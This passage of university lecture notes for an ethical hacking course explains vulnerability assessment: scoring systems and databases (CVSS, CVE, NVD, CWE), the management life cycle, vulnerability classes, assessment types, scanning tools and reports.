• To be aware of emerging security trends, threats, attack vectors and techniques.
• To discover new weaknesses in Operating Systems and Networks.
• To gather information to aid in the prevention of security issues.
• To know an effective strategy to recover from a network attack.

Vulnerability Assessment
Vulnerability assessment is the process of identifying, analyzing, and prioritizing security weaknesses in a system,
network, or application. It helps organizations detect vulnerabilities before they can be exploited by attackers and
implement corrective measures to enhance security.

2 approaches to Network Vulnerability Scanning:

Active Scanning Passive Scanning
• Attacker directly engages target network. • Attacker seeks vulnerabilities without direct
interaction.
• Active scanning simulates attack.

PES University Department of CSE

Ethical Hacking

• Passive scanning gathers info from normal

• Uncovers exploitable vulnerabilities. communications.
• Identifies operating systems,applications, and
ports.

Limitations of Vulnerability Assessment:

• Vulnerability scanning software limited in real-time detection.
• Requires updates for new vulnerabilities.
• Effectiveness depends on maintenance by vendor and administrator.
• Doesn't assess security control strength.
• Vulnerability-scanning software can have flaws.
• Human judgment required.
• Identifying false positives and false negatives needed.

Vulnerability Scoring Systems and Databases

Repositories used to assess, rate and document the severity and characteristics of any vulnerability.

Few of these systems and platforms are:

a) Common Vulnerability Scoring System (CVSS):
• CVSS framework communicates IT vulnerability characteristics and impacts.
• Enables repeatable, accurate measurement with quantitative scores.
• Commonly used to prioritize remediation efforts and gauge vulnerability severity.

Comprises three metrics:

- Base Metric: Represents inherent vulnerability qualities.
- Temporal Metric: Captures features changing over the vulnerability's lifespan.
- Environmental Metric: Tailored to specific environments or implementations.

• Each metric generates a score from 1 to 10, with 10 being the most severe.
• A vector string combines these scores for an overall severity assessment.
• CVSS calculator helps rank vulnerabilities and assess their security risk.

b) Common Vulnerabilities and Exposures:

• CVEs are publicly recorded security flaws.
• Each has a unique CVE ID for easy identification
• Managed by MITRE with CISA funding.
• Assigned based on fixability, vendor acknowledgment, and codebase.

PES University Department of CSE

Ethical Hacking

c) National Vulnerability Database (NVD):

• NVD is the US gov't repository for vulnerability data.
• Uses SCAP for automation in vulnerability management.
• Contains security checklists, software flaws, misconfigurations, and impact metrics.
• Analyzes published CVEs for CVSS, CWE, and applicability statements.
• Relies on vendors, researchers, and coordinators for data, doesn't perform testing.

d) Common Weakness Enumeration (CWE):

• Sponsored by MITRE, supported by US-CERT and DHS.
• Latest version: CWE 3.2, released in January 2019.
• Over 600 categories of weaknesses for identification, mitigation, and prevention.
• Advanced search allows for research, development, and architectural concept-based weakness exploration.

Vulnerability-Management Life Cycle

Pre-Assessment Phase:
• Understand and identify business processes.
• Identify the applications, data, and services that support the business processes and perform code review.
• Identify approved software, drivers and configurations.
• Create inventory of all assets and rank critical ones.
• Deep dive into network architecture and infrastructure.
• Identify existing controls.
• Understand policy implementation and standards compliance.
• Define scope of assessment.
• Create information protection procedures.

Vulnerability Assessment Phase

PES University Department of CSE

Ethical Hacking

• Evaluate Physical Security – Assessing physical access controls and security measures.
• Check for Misconfigurations and Human Error – Identifying weaknesses caused by misconfigurations or
human mistakes.
• Run Vulnerability Scans – Conducting automated scans to detect vulnerabilities.
• Select Appropriate Scan – Choosing the right type of scan for the environment.
• Prioritize Vulnerabilities – Ranking vulnerabilities based on risk and impact.
• Identify False Positives and Negatives – Verifying results to ensure accuracy.
• Apply Business and Tech Context to Scanners – Understanding vulnerabilities in the context of business
operations.
• Gather OSINT for Validation of Vulnerabilities – Using open-source intelligence to confirm risks.
• Create Vulnerability Scan Report – Documenting findings for further action.

Post-Assessment Phase

1. Risk Assessment
o Categorize risks.
o Assess severity of impact.
o Determine threat and risk levels.
2. Remediation
o Prioritize risks based on ranks.
o Devise an action plan for remediation.
o Perform root cause analysis.
o Apply patches and fixes.
o Document findings and conduct awareness training.
3. Verification

PES University Department of CSE

Ethical Hacking

Verify the working of remediated vulnerabilities.

o
Perform dynamic analysis.
o
Review attack surface.
o
4. Monitoring
o Scan for vulnerabilities periodically.
o Ensure timely remediation.
o Implement intrusion detection and prevention.
o Enforce policies, procedures, and controls.

Vulnerability Classification
a. Misconfiguration:
• Caused by human error
• Unauthorized access risk
• Affects various system components
Ex: debug mode, open ports, outdated software, and more.

b. Default Installations:
User-friendly but insecure initially
Risks from unaltered defaults can lead to data breaches.

c. Buffer Overflows:
Results from coding errors, enabling system access.
Attackers exploit insufficient bounds checking.

d. Unpatched Servers:
Compromise security, attract hackers.
Serve as entry points into networks.
Updating and patching mitigates vulnerabilities.

e. Design Flaws:
Universal vulnerabilities in system design.
Exploited for bypassing security mechanisms and gaining access.

f. Operating System Flaws:

Vulnerabilities lead to trojans, worms or viruses.
Timely patching, minimal software, firewall apps protect the OS.

g. Application Flaws:
Vulnerabilities in apps exploited by attackers.
Secure apps with user validation and authorization.

h. Open Services:
Unnecessary or insecure ports risk data loss and DoS attacks.
Continuous checks reduce network risk.

i. Default Passwords:
Failure to change defaults allows attacks.
Protect password confidentiality to prevent system compromise.

PES University Department of CSE

Ethical Hacking

Types of Vulnerability Assessments

Type Description
Active Assessment Uses network scanners to find hosts, services, and vulnerabilities.

Passive Assessment Monitors network traffic to detect active systems, services, and
vulnerabilities without directly interacting with them.
External Assessment Evaluates the network from an outsider’s perspective, identifying
vulnerabilities accessible from the internet.
Internal Assessment Scans the internal infrastructure for vulnerabilities that an insider
might exploit.
Host-based Assessment Checks configurations, directories, and system settings for
security flaws.
Network-based Assessment Identifies network security weaknesses that could be exploited in
attacks.
Application Assessment Tests websites and web apps for vulnerabilities like
misconfigurations, outdated content, or known exploits.
Database Assessment Evaluates databases (MySQL, MSSQL, Oracle, PostgreSQL) for
vulnerabilities, including data exposure and injection risks.
Wireless Network Assessment Identifies weaknesses in wireless infrastructure.
Distributed Assessment Evaluates vulnerabilities in distributed systems (e.g., client-server
applications).
Credentialed Assessment Conducted with valid user credentials to check deeper security
issues.
Non-Credentialed Assessment Performed without login credentials to identify publicly
accessible vulnerabilities.
Manual Assessment Conducted manually by ethical hackers to identify vulnerabilities,
assess risks, and rank security issues
Automated Assessment Uses tools like Nessus, Qualys, or GFI LanGuard to detect
vulnerabilities systematically.

Approaches to Vulnerability Assessment

Product-Based Solutions Service-Based Solutions

• Installed in the organization’s internal • Offered by third parties, such as auditing or
network security consulting firms
• Installed in private or non-routable space or • Some solutions are hosted inside the
the Internet-addressable portion of an network, while others are hosted outside the
organization’s network network
• A drawback of this solution is that attackers
can audit the network from outside

PES University Department of CSE

Ethical Hacking

• If installed in the private network or, in

other words, behind the firewall, it cannot
always detect outside attacks

Tree-Based Assessment Inference-Based Assessment

• The auditor selects different strategies for • Scanning starts by building an inventory
each machine or component of the of protocols found on the machine
information system • After finding a protocol, the scanning
• Example: The administrator selects a process detects which ports are attached
scanner for servers running Windows, to services, such as an email server, web
databases, and web services, and uses server, or database server
another scanner for Linux servers • After finding services, the process selects
• This approach relies on the administrator vulnerabilities on each machine and starts
providing a starting list of intelligence and to execute the relevant tests
then scanning continuously without
incorporating any information found at the
time of scanning

Characteristics of a Good Vulnerability Assessment

Choosing the right vulnerability assessment solution is crucial.

• Accurate testing of network components

• Inference-based approach
• Regular updates from databases
• Customizable, actionable reports
• Compatibility with multiple networks
• Offers remedies and workarounds
• Mimics attacker's perspective for testing.

Working of Vulnerability Scanning Solutions

PES University Department of CSE

Ethical Hacking

This process ensures that security risks in a network are identified and addressed systematically.

1. Locate Nodes: Identify the devices, servers, or endpoints in the network that need to be assessed.
2. Perform Service and OS Discovery on Them: Scan the located nodes to determine the running services and
operating systems.
3. Test Services and OS for Known Vulnerabilities: Evaluate the discovered services and OS against known
vulnerability databases.
4. Findings and Recommendations: Generate a report with the vulnerabilities found and suggest mitigation
measures.
5. Term of References: Define the scope, objectives, and guidelines for the vulnerability scanning process.
Types of Vulnerability Assessments Tools
Host-Based Vulnerability Assessment Tools
• Identify the OS running on a host and detect vulnerabilities.
• Search for common applications and services.

Depth Assessment Tools

• Find unknown vulnerabilities in a system.
• Use fuzzers to identify weaknesses.

Application-Layer Vulnerability Assessment Tools

• Focus on web servers or databases.

Scope Assessment Tools

• Secure IT systems by testing applications and OS for vulnerabilities.

Active and Passive Tools

• Active scanners check networks but consume resources.
• Passive scanners observe and process data without affecting performance.

Location and Data Examination Tools

• Include network-based, agent-based, proxy, and cluster scanners.

Criteria for a Vulnerability Assessment Tool

Criteria for choosing a vulnerability assessment tool:
1. Types of vulnerabilities covered.
2. Testing capability and system coverage.

PES University Department of CSE

Ethical Hacking

3. Ability to produce clear, actionable reports.

4. Efficiency, resource usage, and service impact.
5. Smart scanning capabilities.
6. Support for user-developed tests.
7. Test scheduling for optimal network performance.

Best Practices for Selecting Vulnerability Assess Tools

• Ensure that it does not damage your network or system while running tools.
• Understand the functionality and decide on the information that needs to be collected before beginning.
• Decide the source location of the scan, taking into consideration the information that needs to be collected.
• Enable logging every time a computer is scanned.
• Users should scan their systems frequently for vulnerabilities.

Vulnerability Assessment Tools

Qualys-
• Cloud based service that provides insights into latest internet threats and the systems that are susceptible to
them.
• Provides continuous identification and monitoring of unexpected changes.

Nessus-
• Arguably one of the best platforms for vulnerability scanning and for identifying configuration issues and
malwares.
GFI LanGuard-
• Scans, detects, assess and recitifies security vulnerabilities in a network and connected devices.

OpenVAS-
• A framework of several tools for performing vulnerability scanning and management.

Nikto-
• A web server assessment tool that discovers vulnerabilities and potential threats on a web server.

Other tools include:

Qualys FreeScan, beSECURE (AVDS), Acunetix Web Vulnerability Scanner, Nexpose, Network Security
Scanner,SAINT, Nipper Studio, Core Impact Pro, etc.

Vulnerability Assessment Reports

A Vulnerability Assessment Report is a document that outlines security weaknesses found in a system,
network, or application after scanning.
Or
Contains scanner's assessment of vulnerabilities.

It helps organizations identify potential security risks and take action to mitigate them before attackers can exploit
them.

PES University Department of CSE

Ethical Hacking

o Scan Information – Details about the scanning process, including tools, methodologies, and
configurations used.
o Target Information – Information about the systems, applications, or networks being assessed.
o Results – Findings from the assessment, including identified vulnerabilities, risk levels, and
remediation recommendations.

Two types of vulnerability reports:

[Link] Vulnerability Reports

o For all scanned devices and servers.
o Includes new vulnerabilities, open ports, remediation suggestions and patch links.

2. Security Vulnerability Summaries.

o Individual scan report for each device or server.
o Summary includes current flaws, vulnerability categories, new findings,severity, and resolved
vulnerabilities.

PES University Department of CSE